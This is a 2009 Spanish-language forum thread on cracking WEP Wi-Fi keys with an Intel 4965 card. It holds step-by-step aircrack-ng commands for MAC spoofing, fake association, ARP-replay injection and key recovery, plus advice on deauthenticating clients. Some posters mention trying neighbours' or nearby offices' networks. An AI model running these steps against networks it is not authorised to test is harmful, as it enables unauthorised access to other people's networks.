Publicado por: JuaNaN_ en 09-02-2009, 10:58 (Lunes)
buenas!yo he probado con el portatil y se me ha quedado en read packets y subia muy muy lento,0 ARP,unos 10 ACKs y 0 pps, he desconectado el cable de red del sobremesa y al minuto o dos ha empezado a subir todo rapidisimo.En cambio he probado con la del vecino (Solo probado sin malas intenciones) y nada se me queda en read packets y sin subir y no se que hacer.
los pasos que he seguido son:
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 (y que este en modo menaged)
ifconfig wlan0 up
iwlist wlan0 scan (busco todo la red,copio mac y essid y lo pego en wpa.conf)
airmon-ng start wlan0 Canal
airodump-ng -w prueba --bssid lamac -c canal mon0
en otra consola ejecuto el wpa_supplicant
y en otra consola el aireplay-ng -3 -b lamac -h 00:11:22:33:44:55 mon0 y ahi se me queda en read packets sin subir ni nada.ya he probado de todo y sigue sin subir.
saludos!

Modifico: a los 15 o 20 mins no se cierto se ha puesto a injectary conseguido!!!
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 10-02-2009, 17:37 (Martes)
Se sabe por que injecta cuando quiere y a las redes que quiere?
Título: Re: Inyectar con 4965
Publicado por: eltha en 15-02-2009, 16:04 (Domingo)
Buenas a todos otra vez.

Bueno, al lio, no todos los routers admiten la mac 00:11:22:33:44:55, no porque lo diga yo, es que en muchos sitios ya lo he leido. Ademas, si no sabes el modelo del router no podemos saber si admite esa mac. Por otra parte, la verdad es que a veces tarda un poquito incluso con el router justo al lado, asi que te recomiendo que tengas un poco de paciencia (y que no ataques al vecino, o por lo menos no lo comentes  ;D)

Y yo ya vuelvo a mi pregunta de siempre, ¿¿por que no consigo un handshake con mi WPA??  :'(

Espero que lo de la mac te haya servido de explicacion, y si alguien sabe algo de lo de las WPA que lo comente por Dios, que voy a sudar tinta para conseguirlo  :D

Saludos ^^
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 17-02-2009, 14:18 (Martes)
jajaja probare con otra mac inventada y os comento,y respecto a lo del vecino es "broma..."jajajajaja
Título: Re: Inyectar con 4965
Publicado por: supumaster en 17-02-2009, 15:08 (Martes)
todo perfecto, muchas gracias, ya creia k me volvia loco, k si intalar los drivers compilar kernel, y al final wpa_supplicant. lo consegi, gracias de nuevo.
con el atace chop chop, lo sake en varios minutos
saludos
Título: Re: Inyectar con 4965
Publicado por: eltha en 18-02-2009, 01:04 (Miércoles)
Buenas a todos.

JuaNaN_, una cosa, si no te importa ¿podrias usar la mac de un cliente que este usando el router? Es para ver si soy al unico al que le da problemas o si, por el contrario, a mas gente le falla la inyeccion. Y con respecto a lo del vecino, espero que no te haya molestado, es que creo recordar que hay algo por ahi en el foro de que no podemos fomentar la pirateria ni nada de eso  ^-^  ;D

(Añadido):
no existe algun manual con todos los pasos exactos sobre que se tiene que hacer??? Intente hacer lo del video y segui todo como se debia pero al final no obtuve la clave. No habra algun manual? Saludos.
Y ahora que me doy cuenta, Darude, si usas el wifiway 1.0 en vez del Ubuntu tienes que seguir los pasos que estan escritos en la primera pagina, si usas el Ubuntu tendrias que tener el kernel actualizado, con los drivers y todo eso, y la verdad, teniendo ese pedazo CD que se quiten los demas sistemas operativos  ;D
De todas formas te recomiendo que uses un pendrive con la miniguia de la primera pagina. De todas formas, si tienes problemas podemos intentar ayudarte siempre que postees lo que te ocurre :D

Bueno, saludos a todos  >:(
Título: Re: Inyectar con 4965
Publicado por: jasp31 en 18-02-2009, 13:38 (Miércoles)
Yo opino igual que Darude, que si alguien de los muchos que parece que lo han conseguido, podria hacer un manual con imagenes o un video como el de dexter back, pero en este caso aplicado al Live CD del Wifiway 1.0 , y no al ubuntu, dado que este es el post del Live CD Wifiway 1.0, pues estariamos muchos muy agradecidos.
Somos muchos los que empezamos a interesarnos por el linux, pero debido primero a la variedad de distribuciones linux (sean live cds o no), y luego a la multitud de posts que hay sobre la 4965, pues nos liamos.
Cuando el wifiway 1.0 era beta, y habia que actulizar kernel y drivers, ahi los novatos nos perdiamos la mayoria, y ahora que el wifiway 1.0 ya tiene un kernel apropiado para inyectar, y que supuestamente es la primera live que trae los drivers de la 4965, pues un manual o video de la live para inyectar,  paso a paso, para que hasta el mas novato pudiera intentar conseguirlo, nos ayudaria a todos muchisimo.
Eso si, agradeceros a todos los multiples posts y esfuerzos, pues nos hace a muchos interesarnos por el linux. Cuantos mas lo consigamos, mas podremos aprender todos y mas podremos ayudar todos. Entiendo, que gente con nivel avanzado, le fastidie volver a citar cosas que dan por supuestas, o ayudar a gente que no se molesta en buscar y le den las cosas mascadas, pero este no es mi caso. He leido la mayoria de posts, y como veis dado la gran cantidad de posts que hay, a simple vista, no resulta tan facil.
Eso si, prometo que si lo consigo, intentare yo hacer tambien un manual o video como el de dexter back para la live. Gracias a tod@s
Título: Re: Inyectar con 4965
Publicado por: mendaur en 18-02-2009, 22:26 (Miércoles)
Hola compañeros, yo he conseguido inyectar y ademas a gran velocidad todo lo necesario esta en la primera pagina, leer post "dexter back", es simplemente poner los comandos que nos han puesto nuestros compañero y ........
Yo tengo una duda una vez que inyecte con la 4965 como puedo volver a ponerla en modo manager, o sea cambiarla del modo monitor a manager, no se como hacerlo he probado varios comandos pero no he conseguido que funcione. La unica manera es saliendo de wifiway pero claro eso no es operativo.
un saludo y gracias
Título: Re: Inyectar con 4965
Publicado por: jasp31 en 19-02-2009, 20:12 (Jueves)
Al final tras muchas pruebas, siguiendo el video de dexter back, y gracias a un consejo de Bht Sata, de que aunque al hacer airmon-ng start wlan0 channel , me dijera en Chipset, Unknown , pues siguiera probando igual, pues lo consegui.
Eso si, lo pongo por si sirve de ayuda, a mi no me sirvio a la hora del aircrack, pues lo de aircrack-ng captura.cap ni aircrack-ng *.cap, el primero no me lo abria y el segundo, se quedaba en un bluque infinito.
Pero al final me sirvio, y al momento el:
aircrack-ng -z *.cap
Muchas gracias a tod@s
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 21-02-2009, 10:44 (Sábado)
Buenas a todos.

JuaNaN_, una cosa, si no te importa ¿podrias usar la mac de un cliente que este usando el router? Es para ver si soy al unico al que le da problemas o si, por el contrario, a mas gente le falla la inyeccion. Y con respecto a lo del vecino, espero que no te haya molestado, es que creo recordar que hay algo por ahi en el foro de que no podemos fomentar la pirateria ni nada de eso  ^-^  ;D

(Añadido):
no existe algun manual con todos los pasos exactos sobre que se tiene que hacer??? Intente hacer lo del video y segui todo como se debia pero al final no obtuve la clave. No habra algun manual? Saludos.
Y ahora que me doy cuenta, Darude, si usas el wifiway 1.0 en vez del Ubuntu tienes que seguir los pasos que estan escritos en la primera pagina, si usas el Ubuntu tendrias que tener el kernel actualizado, con los drivers y todo eso, y la verdad, teniendo ese pedazo CD que se quiten los demas sistemas operativos  ;D
De todas formas te recomiendo que uses un pendrive con la miniguia de la primera pagina. De todas formas, si tienes problemas podemos intentar ayudarte siempre que postees lo que te ocurre :D

Bueno, saludos a todos  >:(

Lo del vecino no pasa nada hombre jejeje. Y lo de una mac que no sea la de 00:11:.... si he probado inventandome una y nada funciona cuando quiere y a las redes que quiere.
Ahora voy a probar a instalarmelo en el portatil y actualizar todo lo que se pueda aver si asi consigo que funcione.
Saludos!
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 26-02-2009, 21:55 (Jueves)
Alguien tiene noticias nuevas sobre esta tarjeta?
Título: Re: Inyectar con 4965
Publicado por: drvalium en 26-02-2009, 22:08 (Jueves)
Citar
En cambio he probado con la del vecino (Solo probado sin malas intenciones)

¿sin malas intenciones? que noble eres.

lo de que es broma no me lo creo, te has ganado unas vacaciones


valium the kid
Título: Re: Inyectar con 4965
Publicado por: ignasih en 27-02-2009, 17:29 (Viernes)
buenas!

ante todo, tengo una ipw 4965-AG , que no sé si sirve con este video.

Aún así, he probado de hacerlo, pero cuando trato de asociar, me sale esto:


Trying to associate with 00:19:cb:36:dd:4c (SSID='WLAN_8B' freq=2452 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Authentication with 00:19:cb:36:dd:4c timed out.

Gracias!
Título: Re: Inyectar con 4965
Publicado por: ignasih en 27-02-2009, 17:37 (Viernes)

buenas!

ante todo, tengo una ipw 4965-AG , que no sé si sirve con este video.

Aún así, he probado de hacerlo, pero cuando trato de asociar, me sale esto:

Código: [Seleccionar]
Trying to associate with 00:19:cb:36:dd:4c (SSID='WLAN_8B' freq=2452 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Authentication with 00:19:cb:36:dd:4c timed out.


Gracias!
Título: Duda ?
Publicado por: FLYKIS2 en 01-03-2009, 13:43 (Domingo)
Mi caso es el siguiente....he podido asociarme usando el wpa_supplicant y acto seguido efectuo el ataque A3 (aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0) y pero observo que los datas no suben (0) ...... puede ser que tenga activado el AP el filtro por MAC.... ???

Un saludo
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 01-03-2009, 23:30 (Domingo)
En ese caso deberias suplantar la mac de un usuario conectado, que no te suban las datas es normal si no hay cliente conectado, si lo hay haz un ataque 0 para obligarle a reasociarse, 1 saludo ;)
Título: Re: Inyectar con 4965
Publicado por: FLYKIS2 en 02-03-2009, 07:44 (Lunes)
Lo que ocurre es que nunca he visto un cliente conectado...en ningun momento.....pensaba que con asociarme y poder inyectar se podia conseguir... :-[

Un saludo
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 02-03-2009, 15:59 (Lunes)
Se puede, los ataques estan dividos segun si tiene cliente o no, sin cliente es mucho mas dificil, y suele fallar, pero se puede, con paciencia  ;)
Título: Re: Inyectar con 4965
Publicado por: raulgazquez en 02-03-2009, 16:20 (Lunes)
hola soy nuevo en este tema y queria ver si me pueden ayudar. Soy muy negado para la wifi pero quiero ver si puedo descifrar pass de algun punto de acceso que tengo por mi casa (alrededor) me he bajado la imagen del wifiway 1.0 final y arranco mi portatil (sony con la tarjeta 4965) pero no se que comandos tengo que meterle paso a paso para poder hacer esta tarea. Necesito si son tan amables me deis un manual para pricipiante de lo que tengo que hacer para poder sacar clave a router ya que no se y quiero ver como se hace. Si alguien me puede dejar un manual en privado o decirme donde puedo verlo ya que en este foro he leido pero estoy muy liado porque unos dicen unas cosas, otros otras y no se realmente como tengo que empezar y como debo de acabar con KEY FOUND:  espero me puedan ayudar. Gracias y un saludo.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 02-03-2009, 16:28 (Lunes)
Buenas, para empezar lo que tu pides es ilegal, si hubieras leido las normas lo sabrías, pero aun asi te voy a contextar dando por hecho que es para usar en TU PROPIA CONEXION WIFI, si además te hubieras molestado en leer el post te darias cuenta que en la 1º página, en el 1º post, tienes todo puesto, pero es mas facil preguntar verdad?, haz lo que esta puesto, y si algo no te sale lo preguntas, recuerda, no podemos auditar por ti, la nueva campaña de seguridad wireless, si tienes alguna duda sobre el proceso o no entiendes algo, para eso, SI estamos, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: raulgazquez en 02-03-2009, 16:41 (Lunes)
BHT SATA: no me refiero a quitar clave a otros si no a una oficina que tengo debajo de casa. es que quiero ver como se hace por si se me mete alguien en mi propia red y esta xupando a costa mia, jeje creo que no me habia explicado bien. Pero me dices que en el 1º post pero no sale todo verdad?? me puedes dar un enlace??
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 02-03-2009, 16:48 (Lunes)
Si quieres ver si alguien entra en tu red entra al router y mira el log del dhcpcd y comprueba que solo salga tu mac, si solo te conectas tu pon un filtrado por mac, y por ultimo un wpa/wpa2 con cifrado y auth bastará para que nadie pueda conectarse a tu wifi, si quieres probar la seguridad del cifrado wep en tu propia red solo tienes que ir al primer post (https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/inyectar-con-4965/), lo que tu estas viendo es la ultima página, ve a la primera, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: raulgazquez en 02-03-2009, 16:55 (Lunes)
muchas gracias, pero yo lo que he visto pasos a seguir es lo que nos dice dexter back??? si es asi dimelo para probar porfavor que noto que va lenta la red y quiero saber si se puede crakear la mia propia.
un saludo
Título: Re: Inyectar con 4965
Publicado por: ignasih en 03-03-2009, 13:10 (Martes)
buenas!

Ya he conseguido inyectar perfectamente con WEP

Mi pregunta ahora es como se haría con una WPA, siguiendo más o menos los pasos de este tema?

Gracias!
Título: Re: Inyectar con 4965
Publicado por: ChimoC en 03-03-2009, 15:22 (Martes)
Buenas:

Ignasih... para WPA no hay que inyectar.... hay que capturar el handshake (que nada tiene que ver con inyectar)

Te pido 2 cosas

1.- Para hablar de WPA abre un nuevo post

2.- Ya que has inyectado.. pues te curras un manual con imagenes  ;D

Un saludete

ChimoC
Título: Re: Inyectar con 4965
Publicado por: ignasih en 04-03-2009, 00:44 (Miércoles)
ChimoC:

Ya sé que para WPA hay que capturar un handshake, pero como en este tema todo está relacionado con mi ipw 4965, pues decidí ponerlo aquí, ya que no sé que habría que hacer para conseguir tal handshake.

Y lo de como conseguir la WEP, simplemente he seguido los pasos tal cual puso Jacko en la página 3 (viene con imágenes y todo)

Recomiendo seguir el tutorial de Jacko, ya que yo lo hice tal cual, sin cambiar nada excepto el directorio del archivo wpa.conf, que Jacko lo tiene en root y yo lo puse en escritorio (c/root/desktop/wpa.conf). Por lo demás, todo exactamente igual!

Gracias!
Título: Re: Inyectar con 4965
Publicado por: ChimoC en 04-03-2009, 10:03 (Miércoles)
Buenas:

Ok... ya he puesto un post en Manuales de Wifislax y Wifiway  ;D

https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/inyectar-con-4965-by-jaco-y-bht-sata/

Un saludo

ChimoC
Título: Re: Inyectar con 4965
Publicado por: supumaster en 05-03-2009, 19:59 (Jueves)
simplemente daros las gracias  a la gente de este foro ya k e consegido autentificarme e inyectar, con esta coñazo de tarjeta a demas lo estoy haciendo directamente desde mi ubuntu 8.10

si algien le interesa instalarse los drivers yo lo sake de esta web http://weblogs.inf.udp.cl/nboettcher/07/11/2008/inyectar-paquetes-con-intel-pro-wireless-4965-abgn-mac80211-en-ubuntu-intrepid-ibex-810/



Título: Re: Inyectar con 4965
Publicado por: manuserra en 10-03-2009, 03:45 (Martes)
a mi me funciona tdo perfecto. eso si teneis k tener en cuenta k esta tarjeta su recepcion es una porkeria y si no teneis una señal bastante buena ni podreis inyectar o tardareis muxisimo o luego le costara sacar la contraseña, asik si la teneis integrada en un portatil, ponerle bien elevadito y cerca de la ventana.

saludos
Título: Re: Inyectar con 4965
Publicado por: yiyi jr en 10-03-2009, 23:43 (Martes)
hola muy buenas,tengo el siguiente problema,ago todo lo k pone en este manual Inyectar con 4965 by Jaco, Bht Sata y Dexter Back,y al final cuadno ejecuto para obtener la clave, me sale esto index number of target network,el resto del proceso me sale bien y me inyecta bien,
Como puedo solucionar esto???Alguna idea???
Muxas gracias de antemano.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 12-03-2009, 19:42 (Jueves)
a mi me funciona tdo perfecto. eso si teneis k tener en cuenta k esta tarjeta su recepcion es una porkeria y si no teneis una señal bastante buena ni podreis inyectar o tardareis muxisimo o luego le costara sacar la contraseña, asik si la teneis integrada en un portatil, ponerle bien elevadito y cerca de la ventana.

saludos

Lo siento pero no estoy de acuerdo, es una buena tarjeta, y tiene un alcance considerable, no hay ninguna necesidad de hacer lo que tu dices  ;)

hola muy buenas,tengo el siguiente problema,ago todo lo k pone en este manual Inyectar con 4965 by Jaco, Bht Sata y Dexter Back,y al final cuadno ejecuto para obtener la clave, me sale esto index number of target network,el resto del proceso me sale bien y me inyecta bien,
Como puedo solucionar esto???Alguna idea???
Muxas gracias de antemano.

Escribe la sintaxis que utilizas para el aircrack y la cantidad de iv's capturados, una captura con el mensaje que te devuelve seria de gran ayuda, 1 saludo  ;)
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 17-03-2009, 21:10 (Martes)
hola amigos.

Haber, despues de requetelerme el manual, empiezo a tener los conceptos algo claros.
El caso es k mi tarjeta es una link 5100, pero segun estube leyendo llege a este porst, ya que se supone k para inyectar hay k seguir estos pasos.El portatil es un HP, el del media mark de 599€ de 13".

Estoy intentando esta movida con mi AP belkin, sin filtro mac, con clave wep de 128bit y sin clientes asociados.

Creo el archivo, ejecuto el wpa replicant... todo ok, por el airodump puedo ver que estoy asociado....

ejecuto el airplay, y no sube ni un data, el beacon se mueve, parece que todo bien pero no es capaz de inyectar nada....

Que se supone k hago mal?
Puede que tarde mas de 10 minutos en empezar a subir paketes?
pruebo con otro atake que no sea el 3?
Si por ejemplo asocio mi PDA, seria necesario hacer una autentificacion falsa con el wpa replicant? o directamente le meto el aireplay con la mac de la pda?
Venga un saludo maestros, y gracis por tener paciencia.

PD: nunca he tocado linux, y la verdad es k noto lo mal k ando en este OS.
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 17-03-2009, 22:32 (Martes)
ese ataque sin ningun cliente generando trafico via wifi puede tardar muuuuuucho,necesitarias conectarte a ese router desde otro pc/portatil/pda/ect via wifi y generar trafico.
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 18-03-2009, 09:45 (Miércoles)
entonces sin clientes puedo aplicar el atake 2 del airplay?

od e que manera seria factible atacar sin clientes?

Aunque hay uan cosa que no entiendo, si nos asociamos al AP, ya somos un cliente no? ademas con el aireplay generamos el supuesto trafico necesario, para que el airodump pille los datas no?

si me ekivoco en ago, por favor, corregidme, kiero aclarar conceptos.
Título: Re: Inyectar con 4965
Publicado por: pekis en 23-03-2009, 10:05 (Lunes)
Bueno despues de leer todo el post y otros post que he estado leyendo por aí.  He seguido al pie de la letra todo lo que se dice en el manual de ChimoC y he conseguido con el comando wpa_supplicant que se me asocie y luego e ejecutado los otros comandos tal cual se dice en el manual. El problema que como he podido observar es muy común es que realmente no consigo que inyecte, solo suben los paquetes READ y se queda así subiendo. El resto todo esta bien ya que yo aparezco con mi mac asociada en el router y todo. Una posible solucion que he leido es que no use una mac falsa de tipo 11:22:33:44:55 ya que algunos routers no la aceptan,puede ser correcto?

¿Que posible solucion tiene? uso una tarjeta intel 4965 agn y tiene una sensibilidad increible.


salu2 y gracias por andelantado
Título: Re: Inyectar con 4965
Publicado por: keeperro en 23-03-2009, 10:33 (Lunes)
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 23-03-2009, 11:03 (Lunes)
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando

entocnes como se supone k lo haces tu? peudes poner los pasos exactos?

yo tengo la link 5100 pero se supone k es igual k esta, el casoe s k ya lo daba por imposible, taba pensando en actualizar el kernel del wifiway.
Título: Re: Inyectar con 4965
Publicado por: JuaNaN_ en 23-03-2009, 11:27 (Lunes)
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando


ami me va bien con algunas no con todas haciendo lo que sale en el manual.
entocnes como se supone k lo haces tu? peudes poner los pasos exactos?

yo tengo la link 5100 pero se supone k es igual k esta, el casoe s k ya lo daba por imposible, taba pensando en actualizar el kernel del wifiway.
Título: Re: Inyectar con 4965
Publicado por: keeperro en 23-03-2009, 11:34 (Lunes)
1 tomo los datos de de la red mac, essid y canal y creo el arxivo wpa.conf
2airmon-ng start wlan0 channel (el numero que le corresponda)
3ifconfig wlan0 down
4macchanger -m (mac falsa, la de un cliente o la que te guste) wlan0 [este paso lo puede suprimir junto al 3 y el 5 si dejas tu mac
5ifconfig wlan0 up
6airodump-ng -w (nombre del arxivo) -c (el canal de la red) --bssid (la mac del ap) mon0
7wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
8aireplay-ng -3 -b (mac ap) -h (mac de tu dispositivo ten en cuenta si la as cambiado)
9aircrack-ng -z *.cap

yo en realidad siempre cambio la mac por 00:11:22:33:44:55 pero creo que se puede dejar la tuya... ;)
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 23-03-2009, 11:52 (Lunes)
1 tomo los datos de de la red mac, essid y canal y creo el arxivo wpa.conf
2airmon-ng start wlan0 channel (el numero que le corresponda)
3ifconfig wlan0 down
4macchanger -m (mac falsa, la de un cliente o la que te guste) wlan0 [este paso lo puede suprimir junto al 3 y el 5 si dejas tu mac
5ifconfig wlan0 up
6airodump-ng -w (nombre del arxivo) -c (el canal de la red) --bssid (la mac del ap) mon0
7wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
8aireplay-ng -3 -b (mac ap) -h (mac de tu dispositivo ten en cuenta si la as cambiado)
9aircrack-ng -z *.cap

yo en realidad siempre cambio la mac por 00:11:22:33:44:55 pero creo que se puede dejar la tuya... ;)

todo esto, con el live cd del wifiway, sin actualizar absolutamente nada?
Eso lo hecho mil veces con mi 5100 y no tira, en cambio con la realink esta pci, me empieza a inyectar del tiron. Se que del AP no es por que con la ralink tira del tiron, y lot engo sin filtro mac ni nada raro.

EDIT: yo hagoe l tutorial, pero lo k tu dices es lanzar antes el airdump y luego el WPAsupli.... la verdad es que no entiendo el por k asi, pero tendre k probarlo...
Título: Re: Inyectar con 4965
Publicado por: pekis en 23-03-2009, 20:04 (Lunes)
Bueno ya he conseguido sacar mi primera clave con la 4965 y me asalta una duda sencilla. ¿Por que solo se me asocia con el wpa_supplicant a algunos router y a otros no?
Hay alguna manera de solucionarlo?

gracias

salu2
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 24-03-2009, 09:27 (Martes)
definitivamente no inyecta ni por activa ni por pasiva, con el hp este es imposible, esperare a una nueva version.

Saludos.
Título: Re: Inyectar con 4965
Publicado por: Picardias en 24-03-2009, 13:42 (Martes)
Hola a todos. Me presento, soy un novatillo en esto de las auditorías wifis, y siempre estoy intentando adquirir nuevos conocimientos, y lo de linux y esto lo tenía pendiente, así que ahora con un poquito de dedicación estoy intentando aprender.

Para empezar, tengo un router Livebox de Orange que uso como "víctima" para estos menesteres, y como PC uso un Dell XPS M1530 que trae esta tarjeta wifi de intel. Supuestamente este router nos lo venden como muy seguro.

Bien, he seguido los pasos del tutorial, y todo perfecto hasta que llegamos a:

wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0

En este momento me comienza un bucle infinito:

Código: [Seleccionar]
wifiway ~ # wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Associated with 00:1f:e1:02:aa:bf
CTRL-EVENT-CONNECTED - Connection to 00:1f:e1:02:aa:bf completed (auth) [id=0 id_str=]

Bien, como podeís ver, al final me conecta, pero es porque este router tiene un botón atras que hay que pulsar a la hora de asociar nuevos dispositivos, lo he pulsado y es cuando ha conectado. Así no tiene gracia XD, así que me pregunto, ¿He echo algo mal? Aquí vienen algunas dudas:

Para crear el wpa.conf, simplemente creo nuevo documento de texto en el escritorio y lo renombro a wpa.conf, ¿Lo hago bien? ¿Es wpa.conf, aunque el cifrado sea wep?

Hecho esto y aunque pulsé el botón, decidí seguir a ver hasta donde podía llegar. Creo que me salió todo correcto:

Código: [Seleccionar]
wifiway ~ # aireplay-ng -3 -b 00:1F:E1:02:AA:BF -h 00:11:22:33:44:55 mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1F:3B:12:CB:0F) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:11:22:33:44:55
13:11:41  Waiting for beacon frame (BSSID: 00:1F:E1:02:AA:BF) on channel 1
Saving ARP requests in replay_arp-0324-131141.cap
You should also start airodump-ng to capture replies.
^Cad 114095 packets (got 1 ARP requests and 0 ACKs), sent 289791 packets...(499 pps)

Código: [Seleccionar]

Hasta que llegué aquí...

Código: [Seleccionar]
wifiway ~ # aircrack-ng -z *.cap
Opening dexter-back-01.cap
Opening replay_arp-0324-131141.cap
Read 811291 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1F:E1:02:AA:BF  Livebox-1230              WEP (0 IVs)
   2  00:1E:4C:5F:DC:2E  Livebox-0BB8              No data - WEP or WPA

Index number of target network ? 1

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 0 ivs.

                                       Aircrack-ng 0.9.3


                       [00:00:00] Tested 0/1400000 keys (got 0 IVs)

   KB    depth   byte(vote)
    0    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    1    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    2    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    3    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    4    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    5    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    6    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    7    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    8    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    9    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   10    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   11    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   12    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)

     KEY FOUND! [ 00:00:00:00:00:00:00:00:00:00:00:00:00 ] (ASCII: ............. )
        Decrypted correctly: 100%

Me pone que ha encontrado la clave... pero no sale nada.

¿Sugerencias?

Muchas gracias
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 24-03-2009, 13:48 (Martes)
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.
Título: Re: Inyectar con 4965
Publicado por: Picardias en 24-03-2009, 14:03 (Martes)
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.

No, tiene la 4965, no va con el Wifiway a pelo???

Que tengo que hacer entonces para obtener mas iv´s, dios, estoy un poco bestante perdido jejej

Gracias
Título: Re: Inyectar con 4965
Publicado por: xeonpj en 24-03-2009, 14:08 (Martes)
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.

No, tiene la 4965, no va con el Wifiway a pelo???

Que tengo que hacer entonces para obtener mas iv´s, dios, estoy un poco bestante perdido jejej

Gracias

no no, perdona, si tienes esa, se supone k asi si, cuanto tiempo has esperado? prueba como dice el compañero,  ejecuta antes el airdump y luego el WPA, con la mia eso da error "busy" osease tarjeta ocupada.

te aconsegaria que probaras con otro router, haber si es k ese no deja-


Título: Re: Inyectar con 4965
Publicado por: Picardias en 24-03-2009, 15:38 (Martes)
He probado con otro router y a la hora de poner el supplicant me pone "device or resource busy", no lo entiendo, si he hecho lo mismo que antes...
Título: Re: Inyectar con 4965
